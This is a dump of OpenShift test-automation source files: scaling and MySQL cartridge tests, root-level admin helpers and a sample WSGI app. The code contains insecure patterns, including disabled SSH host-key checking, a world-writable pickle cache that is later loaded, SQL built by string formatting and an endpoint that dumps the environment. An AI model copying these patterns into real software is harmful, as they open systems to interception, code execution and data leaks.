common.fetch_page(str(app_url) + \"/gear.js\")\n if gear not in gears:\n gears.append(gear)\n print \"GEARS\", gears\n return len(gears)\n\n def test_method(self):\n self.add_step(\n \"Creating a non scalable %s application\"%self.test_variant,\n common.create_app,\n function_parameters = [ self.app_name, \n self.app_type, \n self.user_email, \n self.user_passwd, \n True, \n self.git_repo],\n expect_description = \"The application must be created successfully\",\n expect_return = 0)\n\n ''' \n self.add_step(\n \"Scaling up via REST API\",\n self.config.rest_api.app_scale_up,\n function_parameters = [ self.app_name ],\n expect_description = \"The application must not scale-up successfully\",\n expect_return = 'unprocessable_entity')\n '''\n\n self.add_step(\"Scaling up via REST API\",\n common.scale_up,\n function_parameters = [self.app_name, self.domain_name],\n expect_description = \"The application must not scale-up successfully\",\n expect_return = 2) \n\n '''\n self.add_step(\"Scaling up via REST API\",\n self.config.rest_api.app_scale_up,\n function_parameters = [ self.app_name ],\n expect_description = \"The application must not scale-up successfully\",\n expect_return = 'unprocessable_entity')\n '''\n\n self.add_step(\"Scaling up via REST API\",\n common.scale_up,\n function_parameters = [self.app_name, self.domain_name],\n expect_description = \"The application must not scale-up successfully\",\n expect_return = 2)\n '''\n self.add_step(\"Scaling down via REST API\",\n self.config.rest_api.app_scale_down,\n function_parameters = [ self.app_name ],\n expect_description = \"The application must not scale-down successfully\",\n expect_return = 'unprocessable_entity')\n '''\n self.add_step(\"Scaling down via REST API\",\n common.scale_down,\n function_parameters = [self.app_name, self.domain_name],\n expect_description = \"The application must not scale-up successfully\",\n expect_return = 2)\n '''\n self.add_step(\n \"Embed with mysql\",\n common.embed,\n function_parameters = [ self.app_name, 'add-%s'%common.cartridge_types['mysql']],\n expect_description = \"The mysql must be embeded successfully\",\n expect_return = 0)\n '''\n '''\n self.add_step(\n \"Scaling up via REST API\",\n self.config.rest_api.app_scale_up,\n function_parameters = [ self.app_name ],\n expect_description = \"The application must not scale-up successfully\",\n expect_return = 'unprocessable_entity')\n '''\n 
self.add_step(\"Scaling up via REST API\",\n common.scale_up,\n function_parameters = [self.app_name, self.domain_name],\n expect_description = \"The application must not scale-up successfully\",\n expect_return = 2)\n\n\n # Checking web-page availability with refreshing\n for i in range(1,6):\n self.add_step(\"Checking web-page #%d\" % ( i ),\n common.check_web_page_output,\n function_parameters = [ self.app_name ],\n expect_description = \"The application must be available in the browser\",\n expect_return = 0)\n\n self.add_step(\"Configuring the test application\",\n #self.configure_scale_up_test_application,\n common.inject_app_index_with_env,\n function_parameters = [ self.git_repo, self.app_type],\n expect_description = \"The application must be configured successfully\",\n expect_return = 0)\n\n self.add_step(\"Checking the number of gears (REST API)\",\n common.get_consumed_gears,\n expect_description = \"The number of gears must be '1'\",\n expect_return = 1)\n\n self.add_step(\"Checking the number of gears\",\n common.get_num_of_gears_by_web,\n function_parameters = [self.app_name, self.app_type],\n expect_description = \"The number of gears must be '1'\",\n expect_return = 1)\n \n '''\n self.add_step(\"Scaling down via REST API\",\n self.config.rest_api.app_scale_down,\n function_parameters = [ self.app_name ],\n expect_description = \"The application must not scale-down successfully\",\n expect_return = 'Unprocessable Entity')\n '''\n\n # Checking web-page availability with refreshing\n for i in range(1,6):\n self.add_step(\"Checking web-page #%d\" % ( i ),\n common.check_web_page_output,\n function_parameters = [ self.app_name ],\n expect_description = \"The application must be available in the browser\",\n expect_return = 0)\n \n self.run_steps()\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(NegativeScaling)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.3580246865749359, "alphanum_fraction": 0.3580246865749359, "avg_line_length": 12.5, "blob_id": "fb95903545883fe35f9f28250aebf6a07fc540ef", "content_id": "b7ba157256191ca74fef4f1d7627a266d7ed292b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 81, "license_type": "no_license", "max_line_length": 34, "num_lines": 6, "path": "/automation/open/testmodules/RT/cartridge/app_template/env_var/php/index.php", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "<?php\n foreach ($_ENV as $key=>$val )\n {\n echo $key.\"\\n\";\n }\n?>\n" }, { "alpha_fraction": 0.5710881948471069, "alphanum_fraction": 0.5744638442993164, "avg_line_length": 31.0732479095459, "blob_id": "ecc089ba3aa4d224382d6decbe8f2c82351b1fa0", "content_id": "9d5da2650ddaa7f58d4b433b2b81faa85e7ae6b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10072, "license_type": "no_license", "max_line_length": 219, "num_lines": 314, "path": "/automation/open/lib/common/admin.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from helper import *\nfrom misc import *\n\n\ndef add_application_template(template_tag, descriptor):\n \"\"\"\n This function copies the application template file (in yaml format) to the broker server\n and adds with the appropriate oo-admin command.\n \"\"\"\n\n template_file_name = \"%s/%s.yaml\" % 
(get_tmp_dir(), template_tag)\n template_file = open(template_file_name, \"w\")\n for line in descriptor.splitlines():\n template_file.write(line + \"\\n\")\n template_file.close()\n\n command_get_status(\n \"scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no 2>/dev/null -i %s %s root@%s:/tmp\" % ( get_root_ssh_key(), template_file_name, get_instance_ip())\n )\n\n return run_remote_cmd_as_root( \"oo-admin-ctl-template -c add -n %s -d %s -g git://github.com/openshift/wordpress-example.git -t wordpress --cost 1 -m '{ \\\"a\\\" : \\\"b\\\" }'\" % ( template_tag, template_file_name ))[0]\n\n\ndef get_consumed_gears(user=None):\n \"\"\"\n This function returns the consumed_gears of the given user.\n * if the user is None => REST API (/user) for current user\n * else we use `oo-admin-ctl-user -l $user` to get this value\n * if error, returns None\n \"\"\"\n if user != None:\n #as root#\n (status, output) = run_remote_cmd_as_root(\"oo-admin-ctl-user -l %s\"%user)\n if status == 0:\n obj = re.search(r\"consumed gears:\\s+(\\d+)\", output)\n if obj:\n return int(obj.group(1))\n else:\n print \"ERROR: Unable to parse the consumed gears for %s from oo-admin-ctl-user output.\"%user\n print output\n return None\n else:\n print \"ERROR: Unable to get the number of consumed gears for %s.\"%user\n print output\n return None\n else:\n #as user from REST API\n (user, passwd) = get_default_rhlogin()\n rest = openshift.Openshift(host=get_instance_ip(), user=user, passwd=passwd)\n (status, raw) = rest.get_user()\n if status == 'OK':\n return int(rest.rest.response.json['data']['consumed_gears'])\n else:\n print \"ERROR: %s,%s\"%(status, raw)\n return None\n\n\ndef get_max_gears(user=None):\n \"\"\"\n This function returns the max_gears of the given user.\n * if the user is None => REST API (/user) for current user\n * else we use `oo-admin-ctl-user -l $user` to get this value\n * if error, returns None\n \"\"\"\n if user != None:\n #as root#\n (status, output) = run_remote_cmd_as_root(\"oo-admin-ctl-user -l %s\"%user)\n if status == 0:\n obj = re.search(r\"max gears:\\s+(\\d+)\", output)\n if obj:\n return int(obj.group(1))\n else:\n print \"ERROR: Unable to parse the max_gears for %s from oo-admin-ctl-user output.\"%user\n print output\n return None\n else:\n print \"ERROR: Unable to get the number of max_gears for %s.\"%user\n print output\n return None\n else:\n #as user from REST API\n rest = openshift.Openshift(host=get_instance_ip(), \n user=os.getenv(\"OPENSHIFT_user_email\"), \n passwd=os.getenv(\"OPENSHIFT_user_passwd\"))\n (status, raw) = rest.get_user()\n if status == 'OK':\n return int(rest.rest.response.json['data']['max_gears'])\n else:\n print \"ERROR: %s,%s\"%(status, raw)\n return None\n\n\ndef set_max_gears(user=None, max_gears=3):\n \"\"\"\n This function configures the maximum number of gears the given\n user can consume.\n \"\"\"\n if user is None:\n (user, passwd) = get_default_rhlogin()\n return run_remote_cmd_as_root(\n \"oo-admin-ctl-user -l %s --setmaxgears %d\" % ( user, int(max_gears) )\n )[0]\n\n\ndef set_user_capability(capability, value=\"\", user=None):\n \"\"\"\n addgearsize [small, medium, ...]\n removegearsize [small, medium, ...]\n allowsubaccounts [true, false]\n inheritgearsizes [true, false]\n ...\n ...more from: oo-admin-ctl-user --help\n ...\n \"\"\"\n if user is None:\n (user, passwd) = get_default_rhlogin()\n cmd = \"oo-admin-ctl-user -l %s --%s %s\"%(user, capability, value)\n return run_remote_cmd_as_root(cmd)[0]\n\n\ndef remove_gearsize_capability(gearsize, 
user=None):\n if user is None:\n (user, passwd) = get_default_rhlogin()\n return set_user_capability('removegearsize', gearsize, user)\n\n\ndef add_gearsize_capability(gearsize, user=None):\n if user is None:\n (user, passwd) = get_default_rhlogin()\n return set_user_capability('addgearsize', gearsize, user)\n\n\ndef get_nodes():\n \"\"\"\n Returns a list of nodes running within broker\n When error, returns None\n \"\"\"\n (ret, output) = run_remote_cmd_as_root(\"mco ping\", quiet=True)\n if ret != 0:\n print \"ERROR:\", output\n return None\n\n nodes=[]\n for line in output.split('\\n'):\n obj = re.search(r\"^([^\\s]+)\\s+time=\", line)\n if obj:\n nodes.append(obj.group(1))\n\n return nodes\n\n\ndef destroy_district(district):\n cmd = \"oo-admin-ctl-district -c destroy -n %s\"%(district)\n return run_remote_cmd_as_root(cmd)\n\n\ndef create_district(district):\n cmd = \"oo-admin-ctl-district -c create -n %s\"%(district)\n return run_remote_cmd_as_root(cmd)\n\n\ndef add_node2district(district, hostname):\n cmd = \"oo-admin-ctl-district -c add-node -n %s -i %s\"%(district, hostname)\n return run_remote_cmd_as_root(cmd)[0]\n\n\ndef get_gears_per_node(node=None):\n \"\"\"\n Returns a dict of the gears which reside on a particular node\n (gear uuid -> symlink target, or None for plain directories)\n \"\"\"\n (ret, output) = run_remote_cmd_as_root(\"ls -l /var/lib/openshift/\", node)\n if (ret != 0):\n print \"ERROR getting list of gears from node.\"\n return None\n l = {}\n for line in output.split('\\n'):\n obj = re.search(r\"^d.*\\s+([^\\s]+)$\", line)\n if obj:\n l[obj.group(1)] = None\n continue\n obj = re.search(r\"^l.*\\s+([^\\s]+)\\s+->\\s+([^\\s]+)$\", line)\n if obj:\n # symlinked gears: map the link name to its target\n l[obj.group(1)] = obj.group(2)\n return l\n\n\ndef move_gear_between_nodes(gear_uuid, node_identity):\n cmd = \"oo-admin-move --gear_uuid %s --target_server_identity %s \"%(gear_uuid, node_identity)\n (ret, output) = run_remote_cmd_as_root2(cmd)\n if ret != 0:\n log.error(output)\n\n return ret\n\n\ndef get_districts():\n '''\n cmd = \"oo-admin-ctl-district\"\n (status, output) = run_remote_cmd_as_root2(cmd)\n print output\n return ruby_hash2python(output)\n '''\n from brokerdb import BrokerDB\n db = BrokerDB(collections='district')\n try:\n c = db.get_collection('district')\n if c is None:\n log.error(\"Problem getting collection of districts -> None\")\n return []\n return c\n except Exception as e:\n log.error(str(e))\n return []\n\ndef get_district_of_node(server_identity):\n \"\"\"\n Returns district name of given node's server_identity (None if not found)\n \"\"\"\n for ds in get_districts():\n for si in ds['server_identities']:\n if si['name'] == server_identity:\n return ds['name']\n return None\n\n\ndef get_users():\n from brokerdb import BrokerDB\n db = BrokerDB(collections='user')\n return db.get_collection('user')\n\n\ndef get_district_of_gear(gear_uuid):\n #1. 
get districts\n districts = get_districts()\n for d in districts:\n for si in d['server_identities']:\n node = si['name']\n p_node = get_public_ip(node)\n for g in get_gears_of_node(p_node).keys():\n if g == gear_uuid:\n return d['name']\n return None\n\n\ndef get_multi_node_env_setup():\n \"\"\"\n Returns dict of multi node current setup environment\n \"\"\"\n setup_file =get_msetup_file()\n if valid_cache(setup_file):\n f = open(setup_file, 'r')\n setup = pickle.load(f)\n f.close()\n return setup\n else:\n return setup_multi_node_env()\n\n\n#@exclusive\ndef setup_multi_node_env(district_name=None, force_cache=False):\n \"\"\"\n Adding all nodes to given district if not already have been assigned.\n Returns: \n {'nodes': [n1, n2,..], \n 'district': [{d1},...], \n 'user': [{user1},...]}\n Saves/uses dump in ~/tmp/msetup.openshift for 6hours\n \"\"\"\n log.info(\"Not yet fully tested/supported\")\n return None\n msetup_file = \"%s/msetup.openshift\"%get_tmp_dir()\n if district_name is None:\n district_name = getRandomString(10)\n try:\n if valid_cache(msetup_file) and not force_cache:\n f = open(msetup_file, 'rb')\n msetup = pickle.load(f)\n f.close()\n return msetup\n except Exception as e:\n log.error(\"Unable to read from (corrupted?) cache file %s: %s\"%(msetup_file, str(e)))\n if os.path.exists(msetup_file):\n os.unlink(msetup_file)\n\n nodes = get_nodes()\n for n in nodes : #got private IP addresses from `mco ping` \n ds = get_district_of_node(n)\n if ds is None:\n create_district(district_name)\n log.debug(\"Adding nodes to a district\")\n ret = add_node2district(district_name, n)\n if ret != 0:\n log.error(\"Unable to add a node[%s] to the district[%s].\"%(n, district_name))\n else:\n log.info(\"Node[%s] already belongs to district[%s]\"%(n, ds))\n\n from brokerdb import BrokerDB\n broker = BrokerDB()\n msetup = {'nodes': nodes, \n 'district': broker.get_collection('district'), \n 'user': broker.get_collection('users')}\n\n #Save file for later usage as cache\n if not os.path.exists(msetup_file) or not valid_cache(msetup_file) or force_cache:\n try:\n log.debug(\"Saving msetup file...\")\n oldumask = os.umask(0000)\n f = open(msetup_file, 'wb')\n pickle.dump(msetup, f)\n f.close()\n os.umask(oldumask)\n except Exception as e:\n log.error(e)\n return msetup\n\n\ndef get_msetup_file():\n return \"%s/msetup.openshift\"%get_tmp_dir()\n\n" }, { "alpha_fraction": 0.5902023315429688, "alphanum_fraction": 0.5968050956726074, "avg_line_length": 35.671875, "blob_id": "13ffbbf16a7f2b448bea5d9604d7a39407541710", "content_id": "13f6896d0c3b7395f67690735c0f3a10e544421c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4695, "license_type": "no_license", "max_line_length": 250, "num_lines": 128, "path": "/automation/open/testmodules/RT/cartridge/embed_mysql_to_wsgi.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nMichal Zimen\[email protected]\nApr 05, 2012\n[rhc-cartridge] embed MySQL instance to WSGI/PYTHON application\nhttps://tcms.engineering.redhat.com/case/122453/?from_plan=4962\n\"\"\"\nimport os\nimport sys\n\nimport testcase\nimport common\nimport OSConf\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[rhc-cartridge] embed MySQL instance to an WSGI application\"\n self.app_type = common.app_types[\"python\"]\n self.app_name = \"python4mysql\"\n self.mysql_v = common.cartridge_types['mysql']\n self.steps_list = []\n\n 
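# common.env_setup() is a shared helper; it is assumed to prepare the local test environment (workspace, credentials) before steps are queued\n 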
common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass EmbedMysqlToWsgi(OpenShiftTest):\n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\"Create a WSGI app\", common.create_app, \n function_parameters=[self.app_name, \n self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n \n self.steps_list.append(testcase.TestCaseStep(\"Embed mysql to the app\", \n common.embed,\n function_parameters=[self.app_name, \"add-\" + common.cartridge_types['mysql']],\n expect_description=\"the mysql cartridge should be embedded successfully\",\n expect_return=0))\n\n def mod_config_ru(app_name):\n cmd = \"\"\"cd %s && cat <<'EOF' >>wsgi/application &&\n\nimport MySQLdb\n\ndef mysql():\n content=\"\"\n try:\n con=MySQLdb.connect(host=os.getenv(\"OPENSHIFT_MYSQL_DB_HOST\"), user=os.getenv(\"OPENSHIFT_MYSQL_DB_USERNAME\"), passwd=os.getenv(\"OPENSHIFT_MYSQL_DB_PASSWORD\"), db=os.getenv(\"OPENSHIFT_APP_NAME\"), port=int(os.getenv(\"OPENSHIFT_MYSQL_DB_PORT\")))\n cursor = con.cursor()\n cursor.execute(\"DROP TABLE IF EXISTS ucctalk\")\n cursor.execute(\"CREATE TABLE ucctalk (speaker CHAR(30), title CHAR(60))\")\n cursor.execute(\"INSERT INTO ucctalk (speaker,title) VALUES ('Jeremy Zawodny', 'Optimizing MySQL'), ('Sanja Byelkin', 'Sub-Queries in MySQL'), ('Tim Bunce', 'Advanced Perl DBI')\")\n cursor.execute(\"SELECT * FROM ucctalk\")\n alldata = cursor.fetchall()\n if alldata:\n for rec in alldata:\n content+=rec[0]+\", \"+rec[1]+\"\\\\n\"\n cursor.close()\n con.commit ()\n con.close()\n except Exception, e:\n content = str(e)\n return content\n\nEOF\nsed -i '/response_body = \"1\"/a\\\\\n elif environ[\"PATH_INFO\"] == \"/mysql\":\\\\\n response_body = mysql()' wsgi/application &&\ngit commit -m \"changes\" -a && git push\"\"\"%self.app_name\n (status, output) = common.command_getstatusoutput(cmd)\n return status\n\n self.steps_list.append(testcase.TestCaseStep(\"Modify config.ru for accepting /mysql\",\n mod_config_ru,\n function_parameters=[self.app_name],\n expect_description=\"The modifications should be done without errros\",\n expect_return=0))\n\n def verify(self):\n url = OSConf.get_app_url(self.app_name)\n return common.grep_web_page(url+\"/mysql\", 'Jeremy')\n\n self.steps_list.append(testcase.TestCaseStep(\"Verify the MySQL functionality...\",\n verify,\n function_parameters=[self],\n expect_description=\"The page should be added without errros\",\n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Remove embedded mysql from the app\", \n common.embed,\n function_parameters=[self.app_name, \"remove-\" + common.cartridge_types['mysql']],\n expect_description=\"the mysql should be removed successfully\",\n expect_return=0))\n\n\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EmbedMysqlToWsgi)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 
0.5738137364387512, "alphanum_fraction": 0.5782073736190796, "avg_line_length": 29.34666633605957, "blob_id": "49fac7f2d746010f4c2be9e6685a85812b94a33b", "content_id": "ec053165aca3600d0b84faab431d408aa1803200", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2276, "license_type": "no_license", "max_line_length": 184, "num_lines": 75, "path": "/automation/open/testmodules/RT/client/create_two_same_app.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n\tself.user_email = os.environ[\"OPENSHIFT_user_email\"]\n \tself.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n self.app_type = \"perl-5.10\"\n self.app_name = \"testapp\"\n tcms_testcase_id=98574\n\n \tcommon.env_setup()\n \tself.steps_list = []\n\n def finalize(self):\n pass\n\nclass CreateTwoSameApp(OpenShiftTest):\n def test_method(self):\n\n\tstep = testcase.TestCaseStep(\"Create the first app named %s\" %(self.app_name),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.user_email, self.user_passwd, False],\n expect_return=0\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Create the second app with the same name - %s\" %(self.app_name),\n \"rhc app create %s %s -l %s -p '%s' --no-git %s\" %(self.app_name, self.app_type, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=\"!0\",\n expect_string_list=[\"already exists\"],\n )\n self.steps_list.append(step)\n\n case = testcase.TestCase(\"Try to create two app with the same app\",\n self.steps_list\n )\n case.run()\n\t\n\n\tif case.testcase_status == 'PASSED':\n\t return self.passed(\"%s passed\" % self.__class__.__name__)\n\tif case.testcase_status == 'FAILED':\n\t return self.failed(\"%s failed\" % self.__class__.__name__)\n\t\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CreateTwoSameApp)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6407837271690369, "alphanum_fraction": 0.6534833312034607, "avg_line_length": 33.873416900634766, "blob_id": "9d1a047f3db34b2c7e7e1d836af9d6da63079f6d", "content_id": "fa785a95c75d516b26142a83d14e31df1ef759c9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2756, "license_type": "no_license", "max_line_length": 130, "num_lines": 79, "path": "/automation/open/testmodules/RT/security/delete_old_files_from_tmp.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nJianlin Liu\[email protected]\nDec 30, 2011\n[Security] Delete old files from tmp automatically\nhttps://tcms.engineering.redhat.com/case/122329/?from_plan=4962\n\"\"\"\n\nimport os, sys\nimport rhtest\n\nimport testcase\nimport common\nimport OSConf\nimport rhtest\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nclass OpenShiftTest(rhtest.Test):\n ITEST=\"DEV\"\n def initialize(self):\n self.summary = \"[Security] Delete old files from tmp 
automatically\",\n libra_server = common.get_instance_ip()\n self.app_type = \"php-5.3\"\n self.app_name = \"SecurityTestApp\"\n self.steps_list = []\n tcms_testcase_id=122329\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass DeleteOldFilesFromTmpDevenv(OpenShiftTest):\n def test_method(self):\n self.info(\"Create a %s application\" %(self.app_type))\n ret = common.create_app(self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret,0,\"App should be created successfully\")\n\n source_file = \"%s/data/delete_old_files_from_tmp_devenv.php\" %(WORK_DIR)\n target_file = \"%s/php/index.php\" %(self.app_name)\n self.info(\"Copying test files to app git repo\")\n ret = common.command_get_status(\"cp -f %s %s\" %(source_file, target_file))\n self.assert_equal(ret,0, \"Copy must be done\")\n\n self.info(\"Do git commit\")\n ret = common.command_get_status(\"cd %s && git add . && git commit -m test && git push\" %(self.app_name))\n \n self.assert_equal(ret, 0, \"File and directories are added to your git repo successfully\")\n \n self.info(\"Get app url\")\n app_url= OSConf.get_app_url(self.app_name)\n\n self.info(\"Access app's URL to create files in tmp directory\")\n ret = common.grep_web_page(\"%s/index.php?action=create\"%app_url, \"RESULT=0\")\n self.assert_equal(ret, 0, \"RESULT=0 should be seen in output\")\n\n self.info(\"Log into express server, run /etc/cron.daily/openshift_tmpwatch.sh\")\n (ret, output) = common.run_remote_cmd_as_root(\"/bin/sh /etc/cron.daily/openshift_tmpwatch.sh\")\n\n self.info(\"Access app's URL to check files in tmp directory\")\n ret = common.grep_web_page(app_url, [\"RESULT=1\", \"No such file or directory\"])\n self.assert_equal(ret, 0, \"RESULT=1 should be seen in output\")\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(DeleteOldFilesFromTmpDevenv)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5990639328956604, "alphanum_fraction": 0.6222915649414062, "avg_line_length": 27.141464233398438, "blob_id": "8fd696a70984efcbe96b753af454ba509a79fe3a", "content_id": "ddc6c359a28746447531307c0a20a1b484d182ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5769, "license_type": "no_license", "max_line_length": 185, "num_lines": 205, "path": "/automation/open/prepare_testing_data/data/application.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport os\nimport commands\nimport MySQLdb\n\nvirtenv = os.environ['APPDIR'] + '/virtenv/'\nos.environ['PYTHON_EGG_CACHE'] = os.path.join(virtenv, 'lib/python2.6/site-packages')\nvirtualenv = os.path.join(virtenv, 'bin/activate_this.py')\ntry:\n execfile(virtualenv, dict(__file__=virtualenv))\nexcept IOError:\n pass\n\ndef create_data(speaker_val, title_val):\n content=\"Welcome~\\n\"\n try:\n con=MySQLdb.connect(host=os.environ['OPENSHIFT_DB_HOST'],user=os.environ['OPENSHIFT_DB_USERNAME'],passwd=os.environ['OPENSHIFT_DB_PASSWORD'],db=os.environ['OPENSHIFT_APP_NAME'])\n cursor = con.cursor()\n cursor.execute(\"DROP TABLE IF EXISTS ucctalk\")\n cursor.execute(\"CREATE TABLE ucctalk (speaker CHAR(30), title CHAR(60))\")\n cursor.execute(\"INSERT INTO ucctalk (speaker,title) 
VALUES ('%s', '%s')\" %(speaker_val, title_val))\n cursor.execute(\"SELECT * FROM ucctalk\")\n alldata = cursor.fetchall()\n if alldata:\n for rec in alldata:\n content+=rec[0]+\", \"+rec[1]+\"\\n\"\n cursor.close()\n con.commit ()\n con.close()\n except Exception, e:\n content = str(e)\n return content\n\ndef show_data():\n content=\"Welcome~\\n\"\n try:\n con=MySQLdb.connect(host=os.environ['OPENSHIFT_DB_HOST'],user=os.environ['OPENSHIFT_DB_USERNAME'],passwd=os.environ['OPENSHIFT_DB_PASSWORD'],db=os.environ['OPENSHIFT_APP_NAME'])\n cursor = con.cursor()\n cursor.execute(\"SELECT * FROM ucctalk\")\n alldata = cursor.fetchall()\n if alldata:\n for rec in alldata:\n content+=rec[0]+\", \"+rec[1]+\"\\n\"\n cursor.close()\n con.commit ()\n con.close()\n except Exception, e:\n content = str(e)\n return content\n\n\ndef application(environ, start_response):\n\tctype = 'text/plain'\n\n target_file = \"%swsgi_data_test\" %(os.environ['OPENSHIFT_DATA_DIR'])\n\n\tif environ['PATH_INFO'] == '/health':\n\t\tresponse_body = \"1\"\n\telif environ['PATH_INFO'] == '/env':\n\t\tresponse_body = ['%s: %s' % (key, value)\n for key, value in sorted(environ.items())]\n\t\tresponse_body = '\\n'.join(response_body)\n elif environ['PATH_INFO'] == '/create':\n response_body = create_data(\"speaker1\",\"title1\")\n elif environ['PATH_INFO'] == '/modify':\n response_body = create_data(\"speaker2\",\"title2\")\n elif environ['PATH_INFO'] == '/show':\n response_body = show_data()\n\telse:\n\t\tctype = 'text/html'\n\t\tresponse_body = '''<!doctype html>\n<html lang=\"en\">\n<head>\n <meta charset=\"utf-8\">\n <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge,chrome=1\">\n <title>Welcome to OpenShift</title>\n <style>\n html { background: black; }\n body {\n background: #333;\n background: -webkit-linear-gradient(top, black, #666);\n background: -o-linear-gradient(top, black, #666);\n background: -moz-linear-gradient(top, black, #666);\n background: linear-gradient(top, black, #666);\n color: white;\n font-family: 'Liberation Sans', Verdana, Arial, Sans-serif;\n width: 40em;\n margin: 0 auto;\n padding: 3em;\n }\n a {\n color: #bfdce8;\n }\n \n h1 {\n text-transform: uppercase;\n -moz-text-shadow: 2px 2px 2px black;\n -webkit-text-shadow: 2px 2px 2px black;\n text-shadow: 2px 2px 2px black;\n background: #c00;\n width: 22.5em;\n margin: .5em -2em;\n padding: .3em 0 .3em 1.5em;\n position: relative;\n }\n h1:before {\n content: '';\n width: 0;\n height: 0;\n border: .5em solid #900;\n border-left-color: transparent;\n border-bottom-color: transparent;\n position: absolute;\n bottom: -1em;\n left: 0;\n z-index: -1000;\n }\n h1:after {\n content: '';\n width: 0;\n height: 0;\n border: .5em solid #900;\n border-right-color: transparent;\n border-bottom-color: transparent;\n position: absolute;\n bottom: -1em;\n right: 0;\n z-index: -1000;\n }\n h2 { \n text-transform: uppercase; \n margin: 2em 0 .5em;\n }\n \n pre {\n background: black;\n padding: 1em 0 0;\n -webkit-border-radius: 1em;\n -moz-border-radius: 1em;\n border-radius: 1em;\n color: #9cf;\n }\n \n ul { margin: 0; padding: 0; }\n li {\n list-style-type: none;\n padding: .5em 0;\n }\n </style>\n</head>\n<body>\n <img\n alt=\"OpenShift logo\"\n 
